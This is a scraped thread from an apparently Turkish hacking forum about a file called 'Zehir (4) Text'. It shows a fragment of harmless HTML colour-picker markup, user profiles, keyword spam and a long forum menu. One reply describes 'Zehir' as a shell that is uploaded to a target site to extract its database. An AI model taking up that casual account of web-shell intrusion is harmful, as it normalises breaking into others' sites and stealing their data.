<option value="limegreen">Aзэk Yeюil</option>
</select>
<select name="a" onChange="FormatText('ForeColor', a.options[a.selectedIndex].value);" ID="a">
<option value="0" selected>-- Renk --</option>
<option value="black">Siyah</option>
<option value="white">Beyaz</option>
<option value="blue">Mavi</option>
<option value="red">Kэrmэzэ</option>
<option value="green">Yeюil</option>
<option value="yellow">Sarэ</option>
<option value="orange">Turuncu</option>
<option value="brown">Kahverengi</option>
<option value="magenta">Pembe</option>
<option value="cyan">Aзэk Mavi</option>
<option value="limegreen">Aзэk Yeюil</option>
</select>
«
Son Düzenleme: Ağustos 20, 2008, 02:20:17 ÖÖ Gönderen: MuratbanK
»
Kayıtlı
< -- Seo4SMF Social Bookmark -->
кαяαηℓιктαкi göякєmℓi ιşιğιηιz:
™ нттρ://ωωω.нα¢квαηк.gєη.тя ©
Robot Moderator
HacKer HacK HacKeD HacKing
hacker
Mesajlar: 32159
Re: Zehir (4) Text
Posted on:
Şubat 10, 2012, 11:41:49 ÖS
Hos Geldin Ziyaretci Arkadas. Ben Robot Moderator. HacKbanK tan Tam Anlamıyla Faydalanmak Icin Uye Olman Gerekmektedir.
indir
Zehir (4) Text indir, Zehir (4) Text download, Zehir (4) Text izle, Zehir (4) Text bul, Zehir (4) Text hack Zehir (4) Text hacked Zehir (4) Text hacking Zehir (4) Text hacker Zehir (4) Text programı Zehir (4) Text indir, Zehir (4) Text download, Zehir (4) Text izle, Zehir (4) Text smf, Zehir (4) Text kurulumu, Zehir (4) Text bul
Logged
soguk kuvvet'in HacKbanK Bilgileri
soguk kuvvet
soguk kuvvet
HacKbanKlının Profilini Goster
Ozel Mesaj Gonder
Son Mesajlarını Goster
Arkadas Listeme Ekle
ѕüρєя αктιƒ üує
HacKbanK lıya Ozgu Mesajı
Dj SoGukKuVveT bEat MacHiNiE
Cinsiyeti
Uye Numarası (ID)
8521
HacKbanK a Kayıt Tarihi
Mart 05, 2009, 12:31:56 ÖÖ
Nerden
afyonkarahisar
HacKbanKlının Yası: 21
HacKbanK taki Mesaj Sayısı
228
HacKbanK Rep Puanı
Rep Puanı: 0
Deneyimleri
Aktiflik
Deneyim
Seviye
HıyarlıK
HacKbanK Tecrubeleri
Paylasım
Guc/Power
Ukalalık
Tehlike Duzeyi
Iletisim Bilgileri
Ruh Halim:
Zehir (4) Text
«
Yanıtla #1 :
Mayıs 21, 2009, 07:11:35 ÖS »
murat abi bi de bunun ne işe yaradığını söyleseydin iyi olurdu
.bat uzantısı ile virüs yapma olayı falan mı
Kayıtlı
bakteri29'in HacKbanK Bilgileri
bakteri29
bakteri29
HacKbanKlının Profilini Goster
Ozel Mesaj Gonder
Son Mesajlarını Goster
Arkadas Listeme Ekle
gєℓιşмιş üує
Cinsiyeti
Uye Numarası (ID)
23879
HacKbanK a Kayıt Tarihi
Şubat 09, 2010, 08:49:35 ÖÖ
Nerden
istanbul
HacKbanKlının Yası: 33
HacKbanK taki Mesaj Sayısı
30
HacKbanK Rep Puanı
Rep Puanı: 0
Deneyimleri
Aktiflik
Deneyim
Seviye
HıyarlıK
HacKbanK Tecrubeleri
Paylasım
Guc/Power
Ukalalık
Tehlike Duzeyi
Iletisim Bilgileri
Ruh Halim:
Zehir (4) Text
«
Yanıtla #2 :
Nisan 08, 2010, 07:07:59 ÖS »
abi bu zehir neyin panzehiri anlatırsan sevinirim:D
Kayıtlı
Kaplaner'in HacKbanK Bilgileri
Kaplaner
Kaplaner
HacKbanKlının Profilini Goster
Ozel Mesaj Gonder
Son Mesajlarını Goster
Arkadas Listeme Ekle
gєℓιşмιş üує
Cinsiyeti
Uye Numarası (ID)
50437
HacKbanK a Kayıt Tarihi
Eylül 27, 2010, 01:34:13 ÖS
Nerden
Turkiye/Ankara
HacKbanKlının Yası: 25
HacKbanK taki Mesaj Sayısı
43
HacKbanK Rep Puanı
Rep Puanı: 1
Deneyimleri
Aktiflik
Deneyim
Seviye
HıyarlıK
HacKbanK Tecrubeleri
Paylasım
Guc/Power
Ukalalık
Tehlike Duzeyi
Iletisim Bilgileri
Ruh Halim:
Zehir (4) Text
«
Yanıtla #3 :
Ekim 12, 2010, 09:34:19 ÖS »
Zehir Bir Nevi Shell Benım Bıldıgım Kadarıyla Bunu Php veya Asp html Gibi uzantıyla Kaydedıp hedef Siteye atıp o sitenin db sınısını almak gıbı benım bıldıgım kadarıyla yanls bılıyor da olabılırım.
Kayıtlı
Google Words:
Zehir (4) Text indir, Zehir (4) Text download, Zehir (4) Text izle, Zehir (4) Text bul, Zehir (4) Text programı, Zehir (4) Text hack, Zehir (4) Text hacker, Zehir (4) Text hacked, Zehir (4) Text hacking, Zehir (4) Text resimleri, Zehir (4) Text videosu, Zehir (4) Text smf, Zehir (4) Text peeh,
Sayfa: [
1
]
Yukarı git
Otomatik Tag
Zehir (4) Text, indir , download , izle , bul , Zehir (4) Text, programı , resimleri , smf , Zehir (4) Text, hack , hacker , hacked , hacker , security , support , Zehir (4) Text
« önceki
sonraki »
Gitmek istediğiniz yer:
Gitmek istediğiniz yer:
-----------------------------
FORUM HAKKINDA
-----------------------------
=> Forum Kuralları
=> NicKiniz@HacKbanK.Gen.TR MSN Adres İstekleriniz ve Üye İsim Değişikliği Başvurusu Alanı
=> ANKETLER
=> YÖNETİM EKİBİ
-----------------------------
HACK , HACKER , HACKED , HACKING , GÜVENLİK , GÜVENLİK AÇIKLARI , EXPLOIT, SHELL
-----------------------------
=> HACK
=> HACKER
=> ANTİ VİRÜSLER
=> HacK TeaM
=> GÜVENLİK
===> Şifreleme Araçları ve Programları
=> GÜVENLİK AÇIKLARI
=> MCSE - CISCO
=> YARDIMLAŞMA
=> BanneD
-----------------------------
SİNEMA
-----------------------------
=> SİNEMA
===> Sinema Genel
===> Vizyondaki Filmler
=> Film Download Merkezi
===> MP4 Filmler
===> Yerli Film Download
===> Yabancı Film Download
===> Belgeseller
===> Tek Link Filmler
===> Online Sinema
===> Online Animasyon 3D
===> Online Komedi Talk Show
===> Çizgi Film Download
-----------------------------
Yerli Ve Yabancı Diziler, Anime ve Manga
-----------------------------
=> Dragon Ball
=> The Sarah Connor Chronicles
=> Diziler
===> Yerli Diziler
===> Yabancı Diziler
===> Dizi Download
-----------------------------
MÜZİK
-----------------------------
=> MP3 İndir / DownloaD
===> TürKçe MP3 İndir / DownloaD
===> Yabancı MP3 İndir / DownloaD
=> Müzik
===> HipHop
===> Enstrümentaller
===> Video Klipler
===> Türküler ve Hikayeleri
-----------------------------
PROGRAM , İNDİR , DOWNLOAD
-----------------------------
=> Program Deposu
=> Windows Programları
=> RESİMLİ PROGRAM ANLATIMI
=> PROGRAM İSTEKLERİNİZ
=> MSN
-----------------------------
WEBMASTER , SMF
-----------------------------
=> Genel Bilgiler
=> WebMaster
===> WebMaster Makaleler
=> Web Tasarım
===> Host ve Domain
===> html
===> PHP
===> ASP
===> vBulletin
===> Joomla
=> Simple Machines Forum SMF
===> SMF Temaları
=> SİTE TANITIM
-----------------------------
BİLGİSAYAR , NETWORK , İNTERNET , GSM
-----------------------------
=> PC/Bilgisayar
=> PC Haberleri
=> Donanım
=> Yazılım
===> Delphi
===> C, C++ ve C#
===> Visual Basic
===> Pascal
===> Java
===> Veritabanı ve Sql
=> İşletim Sistemleri
===> WİNDOWS
===> LINUX
===> MAC OS
===> Pardus
=> Teknik Servis
=> Network/İnternet
=> Cep Telefonu Ve GSM Dünyası
=> WALLPAPER
-----------------------------
HABERLER
-----------------------------
=> Türkiye'den Haberler
=> Dünyadan Haberler
-----------------------------
ELEKTRONİK
-----------------------------
=> Elektronik Programlar
=> Elektronik Şemalar
=> Oto Elektrik Dersleri
-----------------------------
GEYİK
-----------------------------
=> Fıkralar
=> Komik, Matrak ve Geyik Yazılar
=> Komik Resimler
=> Hikayeler
=> Sohbet ve Muhabbet
=> Karikatürler
=> Videolar/Animasyonlar
=> Bilmeceler/Bulmacalar
=> Forum Oyunları
-----------------------------
AŞK – SEVGİ
-----------------------------
=> Duygusal Videolar-Klipler
===> Hüseyin Nihal ATSIZ
===> Ahmet Selçuk İlkan
===> Ümit Yaşar Oğuzcan
===> Atilla İlhan
===> Behçet Necatigil
===> Cahit Sıtkı Tarancı
===> Can Yücel
===> Cemal Safi
===> Cemal Süreyya
===> Fazıl Hüsnü Dağlarca
===> Murathan Mungan
===> Orhan Veli Kanık
===> Özdemir Asaf
===> Yusuf Hayaloğlu
===> Bedirhan Gökçe
=> Aşkla İlgili Her Telden Yazılar
=> Aşk Testleri
=> Hüzünlü Aşklar
-----------------------------
+18 KORKU
-----------------------------
=> Resimler
=> Videolar/Animasyonlar
=> Hikaye ve Yazılar
=> Fıkralar
=> KORKU TÜNELİ
-----------------------------
GENEL KÜLTÜR
-----------------------------
=> ATATÜRK KÖŞESİ
=> OSMANLI TARİHİ
===> Osmanlı Padişahları
=> Bilim ve Teknik
=> Edebiyat
=> Tarih
=> Coğrafya
=> Turizm
=> Meslekler Rehberi
=> Biyografi
===> Yerli
===> Yabancı
===> Süper Kahramanlar
-----------------------------
KİTAPLAR / DERGİLER
-----------------------------
=> Kitaplar/Dergiler
===> KİTAP DOWNLOAD
=====> E-Books in English
===> DERGİLER
=====> Comics
===> Kitap Tanıtım
===> Kitap Özetleri
-----------------------------
RESİM GALERİSİ
-----------------------------
=> Aşka ve Sevgiye Dair Resimlerimiz
=> İlginç Resimler
=> RESİMLER
-----------------------------
HAYATA DAİR
-----------------------------
=> YAŞAMDAN
===> Özlü ve Güzel Yazılar
===> Yaşamdan Kesitler/Alıntılar/Hikayeler
===> Kendimizi Ne Kadar Tanıyoruz / Testler
=> İLGİNÇ YAZILAR/OLAYLAR
===> Psikoloji/Psikiyatri
===> Genetik
===> Onkoloji
===> Alerjiler
===> Enfeksiyonlar
===> Diabet
===> Kalp ve Damar Hastalıkları
===> Üroloji
===> Kulak Burun Boğaz
===> Nöroloji
===> Ağız ve Diş Sağlığı
===> Cilt Problemleri
===> Hormon Problemleri
===> Çocuk Hastalıkları
===> Göz
===> Kadın Hastalıkları
===> Fizik Tedavi
===> İlk Yardım ve Çeşitleri
===> Ağrı Ve Çeşitleri
===> İntaniye
=> Alternatif Tıp
=> HUKUK
=> DERT ORTAĞIM KÖŞESİ
=> GÜNÜN SÖZÜ PANOSU
-----------------------------
OYUN
-----------------------------
=> Bilgisayar Oyunları
=> Tam Çözümler
=> Oyun Deposu ve Download Merkezi
=> Flash Oyunlar
=> Oyun Hileleri
=> SATRANÇ DÜNYASI
-----------------------------
BAYANLAR KLÜBÜ
-----------------------------
=> Anneler ve Çocukları
=> Bebek Resimleri
=> Moda
=> Saç ve Makyaj ve Cilt Bakımı
=> İkili İlişkiler
=> Diyetler
=> Yemek Tarifleri
===> İçecekler
===> Çorbalar
===> Sebze Yemekleri
===> Tavuk Yemekleri
===> Et Yemekleri
===> Deniz Ürünleri
===> Salata Tarifleri
===> Yöresel Yemekler
===> Tatlılar Ve Tatlı Çeşitleri
=> BURÇLAR
===> KOÇ
===> BOĞA
===> İKİZLER
===> YENGEÇ
===> ASLAN
===> BAŞAK
===> TERAZİ
===> AKREP
===> YAY
===> OĞLAK
===> KOVA
===> BALIK
=> Kadınca
=> Pratik Bilgiler
=> Rüya Tabirleri
-----------------------------
BAYLAR KLUBÜ VE SPOR BÖLÜMÜ
-----------------------------
=> Babalar ve Çocukları
=> Otomobil
=> Motosiklet Dünyası
=> Modifikasyonlar
=> FORMULA 1
=> SPOR MEYDANI
===> Beşiktaş/BJK
===> FenerBahçe
===> GalataSaray
===> TrabzonSpor
===> Diğer Klüpler
=> Diğer Spor Dalları
=> Erkekçe
-----------------------------
DİNLER
-----------------------------
=> İSLAMİYET
===> İslam Tarihi
===> Peygamber Efendimiz
===> Dini Hikayeler
===> Hadis-i Şerifler
===> İlahiler/Şiirler
===> Sahabeler
===> Dinimizle İlgili Merak Edilenler
===> Resimler
===> Dini Yazılar
===> Dini Programlar
===> Kitabımız Kuran
=> Peygamberler Tarihi
=> Diğer Dinler
-----------------------------
TÜRKİYE VE DÜNYA
-----------------------------
=> ÜLKEMİZ HAKKINDA
=> BÖLGELERİMİZ
=> İLLERİMİZ
=> ÜNİVERSİTELERİMİZ
=> DÜNYA ÜLKELERİ
=> MEDENİYETLER VE MEDENİYET TARİHİ
-----------------------------
HAYVANLAR VE BİTKİLER ALEMİ
-----------------------------
=> Bitki Dünyası
=> Hayvanlar Alemi
-----------------------------
KONU DIŞI
-----------------------------
=> KONU DIŞI
-----------------------------
ARŞİV
-----------------------------
=> ARŞİV
-----------------------------
ÇÖP VARİLİ
-----------------------------
=> ÇÖP BİDONU
Yükleniyor...